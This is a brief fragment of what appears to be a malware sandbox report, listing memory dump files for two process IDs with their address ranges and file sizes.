memory/2004-61-0x0000000071CC1000-0x0000000071CC3000-memory.dmpFilesize
8KB
-
memory/2004-117-0x000000005FFF0000-0x0000000060000000-memory.dmpFilesize
64KB
-
memory/2004-60-0x000000002FF21000-0x000000002FF24000-memory.dmpFilesize
12KB
-
memory/2032-101-0x0000000000A80000-0x0000000000A81000-memory.dmpFilesize
4KB
-
memory/2032-99-0x0000000000260000-0x0000000000262000-memory.dmpFilesize
8KB
-
memory/2032-100-0x0000000000530000-0x000000000056C000-memory.dmpFilesize
240KB
-
memory/2032-97-0x0000000000F60000-0x0000000000F61000-memory.dmpFilesize
4KB
-
memory/2032-93-0x0000000000000000-mapping.dmp